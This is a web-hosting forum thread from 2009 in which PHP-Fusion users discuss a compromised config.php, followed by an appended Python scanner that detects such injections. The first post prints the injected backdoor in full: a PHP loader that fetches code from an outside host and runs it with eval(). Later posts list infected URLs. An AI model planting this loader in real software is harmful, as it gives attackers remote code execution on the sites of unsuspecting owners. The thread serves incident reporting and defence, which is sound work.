|
config.php phpfusion6 hacked
|
| Lory |
Posted on 04-01-2009 20:28
|
Junior Member

Posts: 36
Joined: 12.03.07
|
the config.php file was hacked
I had this in my config.php file before the database setting
Code:
<?php
if (isset($_GET['qq'])) {
    $sock = @fsockopen('km20725.keymachine.de', 80);
    if ($sock) {
        fwrite($sock, 'GET http://km20725.keymachine.de/prv/index.php?host='.$_SERVER['SERVER_NAME'].'&qq='.$_GET['qq'].' HTTP/1.0'."\r\n");
        fwrite($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
        while ($content[] = fgets($sock));
        $content = implode('', $content);
        @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
        fclose($sock);
    }
}
on the domain www.ka-design.info
Edited by Lory on 05-01-2009 11:35
www.slobodnovrije... |
| |
|
|
| Lory |
Posted on 04-01-2009 20:37
|
Junior Member

Posts: 36
Joined: 12.03.07
|
look, same thing happens here..
http://www.christianiateater.no/news.php
http://www.christianiateater.no/?qq=41870 - hacked part
found on google

and these are just the last referers (last few minutes)

They do the same with wordpress
http://www.vitalheute.com/
http://www.vitalheute.com/?qq=231700
Edited by Lory on 04-01-2009 21:11
www.slobodnovrije... |
| |
|
|
| Lory |
Posted on 05-01-2009 11:06
|
Junior Member

Posts: 36
Joined: 12.03.07
|
Hm, very interesting: lots of phpfusion sites hacked the same way and nobody says anything, just editing the first post so now it looks nice.
www.slobodnovrije... |
| |
|
|
| muscapaul |
Posted on 05-01-2009 11:57
|
Super Admin

Posts: 1370
Joined: 10.05.04
|
Looking on Google along those lines, it appears they are all v6 sites. Possibly they were attacked earlier when they were vulnerable, and some of them may even still be vulnerable. Some sites appear to suffer from either injected iframes or inserted weblink panels. These sites need to be cleaned with a full scan of the database and files on the server.
Paul
Time flies like an arrow, fruit flies like banana (Groucho Marx)
Sites: Diptera.info (site owner); Dutch language support site (superadministrator); muscapaul.com (site owner) |
| |
|
|
| kneekoo |
Posted on 05-01-2009 12:44
|

Super Admin

Posts: 346
Joined: 20.01.06
|
The question is... Did you CHMOD 644 your config.php after you finished the install? I only wish I could get that answer from the rest of the "hacked" people as well.
Yes, accidents can happen where a hack gets in between updates, but generally this kind of hack resides in improper setups, which is basically the administrator's responsibility and recommended by the readme file. However, to avoid such situations we will add an extra check inside the core, just so we make sure config.php has the proper CHMOD.
Come visit PHP-Fusion Romania |
| |
|
|
| AusiMods |
Posted on 05-01-2009 13:47
|
Junior Member

Posts: 48
Joined: 27.11.04
|
It's a fairly common hack, and not only Fusion is being attacked by it but also other CMS and blog systems.
As kneekoo says, check your file permissions etc., as with correct permissions writing to the file is not so easy.
http://ausimods.com |
| |
|
|
| Lory |
Posted on 05-01-2009 14:02
|
Junior Member

Posts: 36
Joined: 12.03.07
|
my config.php is chmoded 644 all the time (after finished installation)
www.slobodnovrije... |
| |
|
|
| muscapaul |
Posted on 05-01-2009 15:01
|
Super Admin

Posts: 1370
Joined: 10.05.04
|
If they manage to get access to custom pages on a v6 site it is academic: they can use the custom pages to CHMOD any file and write to it, if they want. In v7 that will require the admin password of the administrator, so it will be more difficult to do that.
Contact me if you want me to have a look at your site's files and database to see if anything is wrong. Preferably use IM.
Edited by muscapaul on 05-01-2009 15:03
Paul
Time flies like an arrow, fruit flies like banana (Groucho Marx)
Sites: Diptera.info (site owner); Dutch language support site (superadministrator); muscapaul.com (site owner) |
| |
|
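Added example, not part of the thread and not PHP-Fusion code: a Python sketch of the file scan and the config.php permission check discussed in the posts above. The regex patterns are heuristics modelled on the snippet in the first post; the host `loader.example` and the demo files are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Heuristics from the quoted snippet: a request-parameter trigger, an outbound
# fetch and eval() appearing together in one PHP file (assumed patterns, not exhaustive).
PATTERNS = {
    "eval": re.compile(r"@?\beval\s*\(", re.I),
    "net_fetch": re.compile(r"\b(fsockopen|curl_exec|file_get_contents\s*\(\s*['\"]https?://)", re.I),
    "request_trigger": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.I),
}

def scan_file(path):
    """Return a list of findings for one PHP file."""
    with open(path, "r", errors="replace") as fh:
        text = fh.read()
    hits = {name for name, rx in PATTERNS.items() if rx.search(text)}
    findings = []
    if {"eval", "net_fetch"} <= hits:
        findings.append("remote-code-loader" if "request_trigger" in hits else "eval+network")
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if os.path.basename(path) == "config.php" and mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("config-writable:%o" % mode)  # looser than the 644 the readme asks for
    return findings

def scan_tree(root):
    """Walk a webroot and map relative path -> findings for flagged files only."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".inc")):
                path = os.path.join(dirpath, name)
                found = scan_file(path)
                if found:
                    report[os.path.relpath(path, root)] = found
    return report

def demo():
    """Scan a constructed webroot: an infected, world-writable config.php and a clean page."""
    root = tempfile.mkdtemp()
    infected = ("<?php if(isset($_GET['qq'])) { $sock = @fsockopen('loader.example', 80);"
                " /* ... */ @eval($content); }\n$db_host = 'localhost';\n")
    clean = "<?php echo file_get_contents('news.txt');\n"
    for name, body, mode in (("config.php", infected, 0o666), ("news.php", clean, 0o644)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return scan_tree(root)
```

A flagged file is a lead for manual review, not proof of compromise; as noted in the thread, a 644 config.php can still be rewritten if an attacker can run code as the web server user.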